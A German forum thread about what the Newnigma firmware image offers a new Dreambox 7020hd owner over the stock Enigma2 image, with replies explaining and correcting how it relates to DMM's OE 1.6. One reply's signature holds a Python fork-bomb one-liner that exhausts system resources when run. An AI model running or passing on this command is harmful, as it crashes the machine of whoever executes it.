Was bringt mir Newnigma?

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Was bringt mir Newnigma?

    Hallo zusammen
    Ich habe meine erste Dreambox 7020hd gekauft und noch ehrlich gesagt keinen Plan.
    Ein Kollege hat geneint ich soll auf jeden Fall Newnigma aufspielen.
    Was für Vorteile bringt mir das gegenüber dem Enigma2?
    für etwas Info wäre ich sehr dankbar.
  • RE: Was bringt mir Newnigma?

    Hi,

    Newnigma² basiert, wie alle Team-Images auf dem Original von DMM zur Verfügung gestellten Image, nur eben mit ein paar sehr nützlichen Erweiterungen. Oben hast Du einen FAQ-Button - hier im Forum steht bereits alles geschrieben, was es nützliches zu Wissen gibt - dieses nun alles zu Wiederholen macht keinen Sinn.

    Bitte mit etwas Eigenintiative erstmal einlesen, ausprobieren, dann kommen auch etwas spezifischere Fragen auf, welche hier dann sicherlich gerne beantwortet werden.

    LG
    Aresta

    PS.& Edit: Aber grundsätzlich muss ich Deinem Kollegen recht geben, dieser scheint wirklich Ahnung zu haben... :D
    Ich benötige kein 3D, Doppel-D reicht vollkommen :tongue:

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Aresta ()

  • RE: Was bringt mir Newnigma?

    Hi

    ich weiß, am Anfang ist es schwer mit all den Informationen klar zu kommen.
    aber ich kann ja mal kurz eine Zusammenfassung schreiben, die eventuell etwas Licht in die Sache bringt.
    Das OS auf den Dreamboxen ist ein Linux.
    Dieses Linux wurde optimiert für Multimedia Anwendungen.
    Der Hersteller der Dreamboxen (DDM - Dream Multimedia) Nennt dieses OS Enigma in der aktuellen Stable Version OE 1.6)
    - OE steht für Open Enbedded was im Prinzip eine Ansammlung von Scripte unter Linux für verschiedene enbedded Systeme ist -> in diesem Fall für Multimnedia Systeme

    Newnigma basiert in genau auf diesem OE 1.6 von DDM und hat als Versionsnummer: Newnigma 3.3.2.
    Im Prinzip ist Newnigma nichts anderes als ein "gemoddetes" Enigma.
    Der Vorteil in dem Image von Newnigma gibt es graphische Verbesserungen in der Oberfläche und einige wichtige Plugins sind auch schon direkt im Image vorhanden, die es so im Enigma nicht gibt, theoretisch aber oft nach zu installieren sind.
    Ich selbst habe bisher nur Enigma und Newnigma aus probiert und kann sagen, daß Newnigma sehr stabil läuft und mir von aussehen her sehr gut gefällt.

    Zu erwähnen wäre hier noch, daß es noch einige weitere Enigma Derivate gibt die bestimmt auch nicht schlecht sind, aber wie gesagt, mit Newnigma kannst du absolut nichts falsch machen.

    Weiterhin zu erwähnen ist hier auch noch, daß DDM schon dabei ist ein OE2 zu entwickeln und parallel dazu recht fleißig auch am neuen Newnigma gearbeitet wird. Man muss also keine angst haben, daß man mit Newnigma in der Entwicklung dem Hersteller OS hinterher hinkt.

    Ich hoffe das hilft dir ein wenig in deiner Entscheidung.
    Ich hoffe auch, daß ich in der Erklärung oben jetzt nicht noch einen Bock reingebracht habe.
    Grüße
    Jan

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von jan_kr ()

  • RE: Was bringt mir Newnigma?

    Original von jan_kr
    ...
    Im Prinzip ist Newnigma nichts anderes als ein "gemoddetes" Enigma.
    ...


    Das ist so nicht korrekt. Die Newnigma2 Images basieren auf dem Original DMM Code und wurden quasi um weitere Funktionen "erweitert". Der Enigma2 Code/das Enigma2 wird hierbei nicht angefasst/gepatch/verändert...
    "Wer ins Wasser sieht, sieht den Himmel auf Erden"
  • RE: Was bringt mir Newnigma?

    Es bringt dir garnichts höchstens deiner box aber das kannste nachlesen das ganze board iss da voll.

    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von sparksofinsanity ()